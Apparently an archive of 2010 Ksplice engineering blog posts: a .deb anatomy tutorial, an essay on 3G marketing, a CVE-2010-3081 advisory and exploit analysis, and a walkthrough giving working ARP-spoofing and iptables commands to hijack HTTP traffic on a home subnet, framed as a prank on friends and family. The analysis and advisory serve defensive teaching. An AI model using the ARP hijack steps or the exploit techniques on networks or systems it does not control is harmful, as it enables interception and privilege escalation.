Ever wondered what a .deb file actually is? How is it put together, and what's inside it, besides the data that is installed to your system when you install the package? Today we're going to break out our sysadmin's toolbox and find out. (While we could just turn to deb(5), that would ruin the fun.) You'll need a Debian-based system to play along. Ubuntu and other derivatives should work just fine.

Finding a file to look at

Whenever APT downloads a package to install, it saves it in a package cache, located in /var/cache/apt/archives/. We can poke around in this directory to find a package to look at.
spang@sencha:~> cd /var/cache/apt/archives
spang@sencha:/var/cache/apt/archives>
spang@sencha:/var/cache/apt/archives> ls
apache2-utils_2.2.16-2_amd64.deb
app-install-data_2010.08.21_all.deb
apt_0.8.0_amd64.deb
apt_0.8.5_amd64.deb
aptitude_0.6.3-3.1_amd64.deb
...
nano, the text editor, ought to be a simple package. Let's take a look at that one.

spang@sencha:/var/cache/apt/archives> cp nano_2.2.5-1_amd64.deb ~/tmp/blog
spang@sencha:/var/cache/apt/archives> cd ~/tmp/blogapt debian dpkg package-management

Digging in

Let's see what we can figure out about this file. The file command is a nifty tool that tries to figure out what kind of data a file contains.

spang@sencha:~/tmp/blog> file --raw --keep-going nano_2.2.5-1_amd64.deb 
nano_2.2.5-1_amd64.deb: Debian binary package (format 2.0)
- current ar archive
- archive file
Hmm, so file, which identifies filetypes by performing tests on them (rather than by looking at the file extension or something else cosmetic), must have a special test that identifies Debian packages. Since we passed the command the --keep-going option, though, it continued on to find other tests that match against the file, which is useful because these later matches are less specific, and in our case they tell us what a "Debian binary package" actually is under the hood—an "ar" archive!

Aside: a little bit of history

Back in the day, in 1995 and before, Debian packages used to use their own ad-hoc archive format. These days, you can find that old format documented in deb-old(5). The new format was added to be "saner and more extensible" than the original. You can still find binaries in the old format on archive.debian.org. You'll see that file tells us that these debs are different; it doesn't know how to identify them in a more specific way than "a bunch of bits":

spang@sencha:~/tmp/blog> file --raw --keep-going adduser-1.94-1.deb
adduser-1.94-1.deb: data
Now we can crack open the deb using the ar utility to see what's inside.

Inside the box

ar takes an operation code and modifier flags and the archive to act upon as its arguments. The x operation tells it to extract files, and the v modifier tells it to be verbose.

spang@sencha:~/tmp/blog> ar vx nano_2.2.5-1_amd64.deb
x - debian-binary
x - control.tar.gz
x - data.tar.gz
So, we have three files.

debian-binary

spang@sencha:~/tmp/blog> cat debian-binary
2.0
This is just the version number of the binary package format being used, so tools know what they're dealing with and can modify their behaviour accordingly. One of file's tests uses the string in this file to add the package format to its output, as we saw earlier.

control.tar.gz

spang@sencha:~/tmp/blog> tar xzvf control.tar.gz
./
./postinst
./control
./conffiles
./prerm
./postrm
./preinst
./md5sums
These control files are used by the tools that work with the package and install it to the system—mostly dpkg.

control
spang@sencha:~/tmp/blog> cat control
Package: nano
Version: 2.2.5-1
Architecture: amd64
Maintainer: Jordi Mallach 
Installed-Size: 1824
Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info
Suggests: spell
Conflicts: pico
Breaks: alpine-pico (<= 2.00+dfsg-5)
Replaces: pico
Provides: editor
Section: editors
Priority: important
Homepage: http://www.nano-editor.org/
Description: small, friendly text editor inspired by Pico
 GNU nano is an easy-to-use text editor originally designed as a replacement
 for Pico, the ncurses-based editor from the non-free mailer package Pine
 (itself now available under the Apache License as Alpine).
 .
 However, nano also implements many features missing in pico, including:
  - feature toggles;
  - interactive search and replace (with regular expression support);
  - go to line (and column) command;
  - auto-indentation and color syntax-highlighting;
  - filename tab-completion and support for multiple buffers;
  - full internationalization support.
This file contains a lot of important metadata about the package. In this case, we have:
  • its name
  • its version number
  • binary-specific information: which architecture it was built for, and how many bytes it takes up after it is installed
  • its relationship to other packages (on the Depends, Suggests, Conflicts, Breaks, and Replaces lines)
  • the person who is responsible for this package in Debian (the "maintainer")
  • How the package is categorized in Debian as a whole: nano is in the "editors" section. A complete list of archive sections can be found here.
  • A "priority" rating. "Important" means that the package "should be found on any Unix-like system". You'd be hard-pressed to find a Debian system without nano.
  • a homepage
  • a description which should provide enough information for an interested user to figure out whether or not she wants to install the package
One line that takes a bit more explanation is the "Provides:" line. This means that nano, when installed, will not only count as having the nano package installed, but also as the editor package, which doesn't really exist—it is only provided by other packages. This way other packages which need a text editor can depend on "editor" and not have to worry about the fact that there are many different sufficient choices available.

You can get most of this same information for installed packages and packages from your configured package repositories using the command aptitude show <packagename>, or dpkg --status <packagename> if the package is installed.

postinst, prerm, postrm, preinst
These files are maintainer scripts. If you take a look at one, you'll see that it's just a shell script that is run at some point during the [un]installation process.

spang@sencha:~/tmp/blog> cat preinst
#!/bin/sh

set -e

if [ "$1" = "upgrade" ]; then
    if dpkg --compare-versions "$2" lt 1.2.4-2; then
	if [ ! -e /usr/man ]; then
	    ln -s /usr/share/man /usr/man
	    update-alternatives --remove editor /usr/bin/nano || RET=$?
	    rm /usr/man
	    if [ -n "$RET" ]; then
	        exit $RET
	    fi
	else
	    update-alternatives --remove editor /usr/bin/nano
	fi
    fi
fi
More on the nitty-gritty of maintainer scripts can be found here.

conffiles
spang@sencha:~/tmp/blog> cat conffiles 
/etc/nanorc
Any configuration files for the package, generally found in /etc, are listed here, so that dpkg knows when to not blindly overwrite any local configuration changes you've made when upgrading the package.

md5sums
This file contains checksums of each of the data files in the package so dpkg can make sure they weren't corrupted or tampered with.

data.tar.gz

Here are the actual data files that will be added to your system's / when the package is installed.
spang@sencha:~/tmp/blog> tar xzvf data.tar.gz
./
./bin/
./bin/nano
./usr/
./usr/bin/
./usr/share/
./usr/share/doc/
./usr/share/doc/nano/
./usr/share/doc/nano/examples/
./usr/share/doc/nano/examples/nanorc.sample.gz
./usr/share/doc/nano/THANKS
./usr/share/doc/nano/changelog.gz
./usr/share/doc/nano/BUGS.gz
./usr/share/doc/nano/TODO.gz
./usr/share/doc/nano/NEWS.gz
./usr/share/doc/nano/changelog.Debian.gz
[...]
./etc/
./etc/nanorc
./bin/rnano
./usr/bin/nano

Finishing up

That's it! That's all there is inside a Debian package. Of course, no one building a package for Debian-based systems would do the reverse of what we just did, using raw tools like ar, tar, and gzip. Debian packages use a make-based build system, and learning how to build them using all the tools that have been developed for this purpose is a topic for another time. If you're interested, the new maintainer's guide is a decent place to start.

And next time, if you need to take a look inside a .deb again, use the dpkg-deb utility:

spang@sencha:~/tmp/blog> dpkg-deb --extract nano_2.2.5-1_amd64.deb datafiles
spang@sencha:~/tmp/blog> dpkg-deb --control nano_2.2.5-1_amd64.deb controlfiles
spang@sencha:~/tmp/blog> dpkg-deb --info nano_2.2.5-1_amd64.deb
 new debian package, version 2.0.
 size 566450 bytes: control archive= 3569 bytes.
      12 bytes,     1 lines      conffiles            
    1010 bytes,    26 lines      control              
    5313 bytes,    80 lines      md5sums              
     582 bytes,    19 lines   *  postinst             #!/bin/sh
     160 bytes,     5 lines   *  postrm               #!/bin/sh
     379 bytes,    20 lines   *  preinst              #!/bin/sh
     153 bytes,    10 lines   *  prerm                #!/bin/sh
 Package: nano
 Version: 2.2.5-1
 Architecture: amd64
 Maintainer: Jordi Mallach 
 Installed-Size: 1824
 Depends: libc6 (>= 2.3.4), libncursesw5 (>= 5.7+20100313), dpkg (>= 1.15.4) | install-info
 Suggests: spell
 Conflicts: pico
 Breaks: alpine-pico (<= 2.00+dfsg-5)
 Replaces: pico
 Provides: editor
 Section: editors
 Priority: important
 Homepage: http://www.nano-editor.org/
 Description: small, friendly text editor inspired by Pico
  GNU nano is an easy-to-use text editor originally designed as a replacement
  for Pico, the ncurses-based editor from the non-free mailer package Pine
  (itself now available under the Apache License as Alpine).
  .
  However, nano also implements many features missing in pico, including:
   - feature toggles;
   - interactive search and replace (with regular expression support);
   - go to line (and column) command;
   - auto-indentation and color syntax-highlighting;apt debian dpkg package-management
   - filename tab-completion and support for multiple buffers;
   - full internationalization support.

If the package format ever changes again, dpkg-deb will too, and you won't even need to notice.

~spang


Ksplice is hiring!

Do you love tinkering with, exploring, and debugging Linux systems? Does writing Python clones of your favorite childhood computer games sound like a fun weekend project? Have you ever told a joke whose punch line was a git command?

Join Ksplice and work on technology that most people will tell you is impossible: updating the Linux kernel while it is running.

Help us develop the software and infrastructure to bring rebootless kernel updates to Linux, as well as new operating system kernels and other parts of the software stack. We're hiring backend, frontend, and kernel engineers. Say hello at jobs@ksplice.com!

Wednesday Sep 29, 2010

Hijacking HTTP traffic on your home subnet using ARP and iptables

Let's talk about how to hijack HTTP traffic on your home subnet using ARP and iptables. It's an easy and fun way to harass your friends, family, or flatmates while exploring the networking protocols.

Please don't experiment with this outside of a subnet under your control -- it's against the law and it might be hard to get things back to their normal state.

The setup

Significant other comes home from work. SO pulls out laptop and tries to catch up on social media like every night. SO instead sees awesome personalized web page proposing marriage:

will you marry me, with unicorns

How do we accomplish this?

The key player is ARP, the "Address Resolution Protocol" responsible for associating Internet Layer addresses with Link Layer addresses. This usually means determining the MAC address corresponding to a given IP address.

ARP comes into play when you, for example, head over to a friend's house, pull out your laptop, and try to use the wireless to surf the web. One of the first things that probably needs to happen is determining the MAC address of the gateway (probably your friend's router), so that the Ethernet packets containing all those IP[TCP[HTTP]] requests you want to send out to the Internet know how to get to their first hop, the gateway.

Your laptop finds out the MAC address of the gateway by asking. It broadcasts an ARP request for "Who has IP address 192.168.1.1", and the gateway broadcasts an ARP response saying "I have 192.168.1.1, and my MAC address is xx:xx:xx:xx:xx:xx". Your laptop, armed with the MAC address of the gateway, can then craft Ethernet packets that will go to the gateway and get routed out to the Internet.

But the gateway didn't really have to prove who it was. It just asserted who it was, and everyone listened. Anyone else can send an ARP response claiming to have IP address 192.168.1.1. And that's the ticket: if you can pretend to be the gateway, you can control all the packets that get routed through the gateway and the content returned to clients.

Step 1: The layout

I did this at home. The three machines involved were:

  • real gateway router: IP address 192.168.1.1, MAC address 68:7f:74:9a:f4:ca
  • fake gateway: a desktop called kid-charlemagne, IP address 192.168.1.200, MAC address 00:30:1b:47:f2:74
  • test machine getting duped: a laptop on wireless called pixeleen, IP address 192.168.1.111, MAC address 00:23:6c:8f:3f:95

The gateway router, like most modern routers, is bridging between the wireless and wired domains, so ARP packets get broadcast to both domains.

Step 2: Enable IPv4 forwarding

kid-charlemagne wants to be receiving packets that aren't destined for it (eg the web traffic). Unless IP forwarding is enabled, the networking subsystem is going to ignore packets that aren't destined for us. So step 1 is to enable IP forwarding. All that takes is a non-zero value in /proc/sys/net/ipv4/ip_forward:

root@kid-charlemagne:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3: Set routing rules so packets going through the gateway get routed to you

kid-charlemagne is going to act like a little NAT. For HTTP packets heading out to the Internet, kid-charlemagne is going to rewrite the destination address in the IP packet headers to be its own IP address, so it becomes final destination for the web traffic:

PREROUTING rule to rewrite the source IP address

For HTTP packets heading back from kid-charlemagne to the client, it'll rewrite the source address to be that of the original destination out on the Internet.

We can set up this routing rule with the following iptables command:

jesstess@kid-charlemagne:~$ sudo iptables -t nat -A PREROUTING \
> -p tcp --dport 80 -j NETMAP --to 192.168.1.200

The iptables command has 3 components:

  • When to apply a rule (-A PREROUTING)
  • What packets get that rule (-p tcp --dport 80)
  • The actual rule (-t nat ... -j NETMAP --to 192.168.1.200)
When

-t says we're specifying a table. The nat table is where a lookup happens on packets that create new connections. The nat table comes with 3 built-in chains: PREROUTING, OUTPUT, and POSTROUTING. We want to add a rule in the PREROUTING chain, which will alter packets right as they come in, before routing rules have been applied.

What packets

That PREROUTING rule is going to apply to TCP packets destined for port 80 (-p tcp --dport 80), aka HTTP traffic. For packets that match this filter, jump (-j) to the following action:

The rule

If we receive a packet heading for some destination, rewrite the destination in the IP header to be 192.168.1.200 (NETMAP --to 192.168.1.200). Have the nat table keep a mapping between the original destination and rewritten destination. When a packet is returning through us to its source, rewrite the source in the IP header to be the original destination.

In summary: "If you're a TCP packet destined for port 80 (HTTP traffic), actually make my address, 192.168.1.200, the destination, NATting both ways so this is transparent to the source."

One last thing:

The networking subsystem will not allow you to ARP for a random IP address on an interface -- it has to be an IP address actually assigned to that interface, or you'll get a bind error along the lines of "Cannot assign requested address". We can handle this by adding an ip entry on the interface that is going to send packets to pixeleen, the test client. kid-charlemagne is wired, so it'll be eth0.

jesstess@kid-charlemagne:~$ sudo ip addr add 192.168.1.1/24 dev eth0

We can check our work by listing all our interfaces' addresses and noting that we now have two IP addresses for eth0, the original IP address 192.168.1.200, and the gateway address 192.168.1.1.

jesstess@kid-charlemagne:~$ ip addr
...
3: eth0:  mtu 1500 qdisc noqueue state UNKNOWN
    link/ether 00:30:1b:47:f2:74 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.200/24 brd 192.168.1.255 scope global eth0
    inet 192.168.1.1/24 scope global secondary eth0
    inet6 fe80::230:1bff:fe47:f274/64 scope link
       valid_lft forever preferred_lft forever
...

Step 4: Set yourself up to respond to HTTP requests

kid-charlemagne happens to have Apache set up. You could run any minimalist web server that would, given a request for an arbitrary resource, do something interesting.

Step 5: Test pretending to be the gateway

At this point, kid-charlemagne is ready to pretend to be the gateway. The trouble is convincing pixeleen that the MAC address for the gateway has changed, to that of kid-charlemagne. We can do this by sending a Gratuitous ARP, which is basically a packet that says "I know nobody asked, but I have the MAC address for 192.168.1.1”. Machines that hear that Gratuitous ARP will replace an existing mapping from 192.168.1.1 to a MAC address in their ARP caches with the mapping advertised in that Gratuitous ARP.

We can look at the ARP cache on pixeleen before and after sending the Gratuitous ARP to verify that the Gratuitious ARP is working.

pixeleen’s ARP cache before the Gratuitous ARP:

jesstess@pixleen$ arp -a
? (192.168.1.1) at 68:7f:74:9a:f4:ca on en1 ifscope [ethernet]
? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

68:7f:74:9a:f4:ca is the MAC address of the real gateway router.

There are lots of command line utilities and bindings in various programming language that make it easy to issue ARP packets. I used the arping tool:

jesstess@kid-charlemagne:~$ sudo arping -c 3 -A -I eth0 192.168.1.1

We'll send a Gratuitous ARP reply (-A), three times (-c -3), on the eth0 interface (-l eth0) for IP address 192.168.1.1.

As soon as we generate the Gratuitous ARPs, if we check pixeleen’s ARP cache:

jesstess@pixeleen$ arp -a
? (192.168.1.1) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]
? (192.168.1.200) at 0:30:1b:47:f2:74 on en1 ifscope [ethernet]

Bam. pixeleen now thinks the MAC address for IP address 192.169.1.1 is 0:30:1b:47:f2:74, which is kid-charlemagne’s address.

If I try to browse the web on pixeleen, I am served the resource matching the rules in kid-charlemagne’s web server.

We can watch this whole exchange in Wireshark:

First, the Gratuitous ARPs generated by kid-charlemagne:

Gratuitous ARPs generated by kid-c

The only traffic getting its headers rewritten so that kid-charlemagne is the destination is HTTP traffic: TCP traffic on port 80. That means all of the non-HTTP traffic associated with viewing a web page still happens as normal. In particular, when kid-charlemagne gets the DNS resolution requests for lycos.com, the test site I visited, it will follow its routing rules and forward them to the real router, which will send them out to the Internet:

DNS response to pixeleen for lycos.com

The HTTP traffic gets served by kid-charlemagne:

HTTP traffic viewed in Wireshark

Note that the HTTP request has a source IP of 192.168.1.111, pixeleen, and a destination IP of 209.202.254.14, which dig -x 209.202.254.14 +short tells us is search-core1.bo3.lycos.com. The HTTP response has a source IP of 209.202.254.14 and a destination IP of 192.168.1.111. The fact that kid-charlemagne has rerouted and served the request is totally transparent to the client at the IP layer.

Step 6: Deploy against friends and family

I trust you to get creative with this.

Step 7: Reset everything to the normal state

To get the normal gateway back in control, delete the IP address from the interface on kid-charlemagne and delete the iptables routing rule:

jesstess@kid-charlemagne:~$ sudo ip addr delete 192.168.1.1/24 dev eth0
jesstess@kid-charlemagne:~$ sudo iptables -t nat -D PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200

To get the client machines to believe the router is the real gateway, you might have to clear the gateway entry from the ARP cache with arp -d 192.168.1.1, or bring your interfaces down and back up. I can verify that my TiVo corrected itself quickly without any intervention, but I won't make any promises about your networked devices.

In summary

That was a lot of explanatory text, but the steps required to hijack the HTTP traffic on your home subnet can be boiled down to:

  1. enabled IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
  2. set your routing rule: iptables -t nat -A PREROUTING -p tcp --dport 80 -j NETMAP --to 192.168.1.200
  3. add the gateway IP address to the appropriate interface: ip addr add 192.168.1.1/24 dev eth0
  4. ARP for the gateway MAC address: arping -c 3 -A -I eth0 192.168.1.1

substituting the appropriate IP address and interface information and tearing down when you're done.

And that's all there is to it!

This has been tested as working in a few environments, but it might not work in yours. I'd love to hear the details on if this works, works with modifications, or doesn't work (because the devices are being too clever about Gratuitous ARPs, or otherwise) in the comments.

--> Huge thank-you to fellow experimenter adamf. <---

~jesstess

Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:
  static inline void __user *compat_alloc_user_space(long len)
  {
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
  }
The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
  {
This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3: 2.6.34.6-54.fc13.i686
  [...]
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.

~price

Friday Sep 17, 2010

CVE-2010-3081

Hi. I'm the original developer of Ksplice and the CEO of the company. Today is one of those days that reminds me why I created Ksplice.

I'm writing this blog post to provide some information and assistance to anyone affected by the recent Linux kernel vulnerability CVE-2010-3081, which unfortunately is just about everyone running 64-bit Linux. To make matters worse, in the last day we've received many reports of people attacking production systems using an exploit for this vulnerability, so if you run Linux systems, we recommend that you strongly consider patching this vulnerability. (Linux vendors release important security updates every month, but this vulnerability is particularly high profile and people are using it aggressively to exploit systems).

This vulnerability was introduced into the Linux kernel in April 2008, and so essentially every distribution is affected, including RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, CloudLinux, and SuSE, among others. A few vendors have released kernels that fix the vulnerability if you reboot, but other vendors, including Red Hat, are still working on releasing an updated kernel.

The published workarounds that we've seen, including the workaround recommended by Red Hat, can themselves be worked around by an attacker to still exploit the system. For now, to be responsible and avoid helping attackers, we don't want to provide those technical details publicly; we've contacted Red Hat and other vendors with the details and we'll cover them in a future blog post, in a few weeks.

Although it might seem self-serving, I do know of one sure way to fix this vulnerability right away on running production systems, and it doesn't even require you to reboot: you can (for free) download Ksplice Uptrack and fully update any of the distributions that we support (We support RHEL, CentOS, Debian, Ubuntu, Parallels Virtuozzo Containers, OpenVZ, and CloudLinux. For high profile updates like this one, Ksplice optionally makes available an update for your distribution before your distribution officially releases a new kernel). We provide a free 30-day trial of Ksplice Uptrack on our website, and you can use this free trial to protect your systems, even if you cannot arrange to reboot anytime soon. It's the best that we can do to help in this situation, and I hope that it's useful to you.

Note: If an attacker has already compromised one of your machines using an exploit for CVE-2010-3081, simply updating the system will not eliminate the presence of an attacker. Similarly, if a machine has already been exploited, then the exploit may continue working on that system even after it has been updated, because of a backdoor that the exploit installs. We've published a test tool to check whether your system has already been compromised by the public CVE-2010-3081 exploit code that we've seen. If one or more of your machines has already been compromised by an attacker, we recommend that you use your normal procedure for dealing with that situation.

~jbarnold

Monday Aug 30, 2010

Ksplice for Fedora!

In response to many requests, Ksplice is proud to announce we're now providing Uptrack free of charge for Fedora!

Fedora will join Ubuntu Desktop among our free platforms, and will give Fedora users rebootless updates as long as Fedora maintains each major kernel release.

However, of note: Fedora is the only Linux distribution that migrates to a new Linux kernel version family (e.g. 2.6.33 to 2.6.34) during the lifetime of the product. This kernel version family migration is such a major version change that Ksplice recommends a reboot for this version change.  These migrations occur roughly twice per year and only in Fedora; all of the other important Fedora kernel updates can be applied rebootlessly, as can the kernel updates for the rest of our supported Linux distributions.

We've also submitted the Uptrack client for integration into a later version of Fedora and are working with the Fedora folks to help make rebootless updates part of the distribution itself. Thanks for all your feedback about Uptrack and keep it coming! 

Best, 
the Ksplice Team

Thursday Aug 19, 2010

Essay: 3G and me

In 2002, I got my first cell phone.

June was stuffy in Manhattan, and my summer internship copy-editing the New York Sun, the now-defunct right-wing newspaper, was just about to start. I swam through the humid air past Madison Square Park to get to the store before closing.

"You want this one," said the salesman at the RadioShack, pointing to a sleek model then on sale. "It's a 3G phone. It'll work with Sprint's new 3G network they're rolling out later this summer."

"Ok," I said. Sure enough, it had 3G:

Sanyo SCP-6200. QUALCOMM 3G CDMA
Fig. 1: Sprint's Sanyo 3G phone, circa mid-2002. An orange of more recent vintage looks on.

A few months later -- after all the Sun's editorials casting doubt on whether lead paint can really poison you had been edited and sent off to our eight readers, and I was back at school -- Sprint did roll out their 3G network:

Sprint launched nationwide 3G service in the 2002 third quarter. The service, marketed as "PCS Vision", allows consumer and business customers to use their Vision-enabled PCS devices to take and receive pictures, check personal and corporate e-mail, play games with full-color graphics and polyphonic sounds and browse the Internet wirelessly with speeds up to 144 kbps (with average speeds of 50 to 70 kbps).

I called Sprint and tried to subscribe. "Sir, you need a 3G phone to sign up," they told me.

"I have one!" I said proudly. "It says 3G CDMA right on the back!"

"Oh, I'm sorry sir. We've changed the labeling of that model. That phone doesn't have true 3G. It doesn't say that on the back any more. If you like I would be happy to sell you the next model, the SCP-6400, which has true 3G."

"No, thanks," I said, thinking that 3G was pretty much a crock, while wryly appreciating RadioShack's ability to make you feel cheated even on a $30 cellphone.

Sure enough, when my phone died and had to be replaced, I saw the new one only said "QUALCOMM CDMA" -- no more "3G". It had been revised downward.

Meanwhile, Sprint's competitors were busy deploying their own nationwide 3G networks. Cingular, then a joint venture of SBC and BellSouth, trumpeted each step in the process:

June 2003:

ATLANTA, June 30 -- Cingular Wireless today announced the world's first commercial deployment of wireless services using Enhanced Datarate for Global Evolution (EDGE) technology. Cingular's initial EDGE service offering is in its Indianapolis market, with subsequent deployments expected later in the year.

Building on more than a decade of wireless data experience, Cingular's EDGE technology enables true "third generation" (3G) wireless data services with data speeds typically three times faster than those available on GSM/GPRS networks.


Or October 2003:
Cingular began offering its 3G service EDGE (Enhanced Datarate for Global Evolution) in Indianapolis in July, becoming the first commercial wireless company in the world to offer the service.

Or June 2004:
This year, further enhancements have been made to the network with the launch of EDGE in Connecticut, a high-speed wireless data service which gives customers true "third generation" (3G) wireless data services with data speeds typically three times faster than what was available on GPRS.

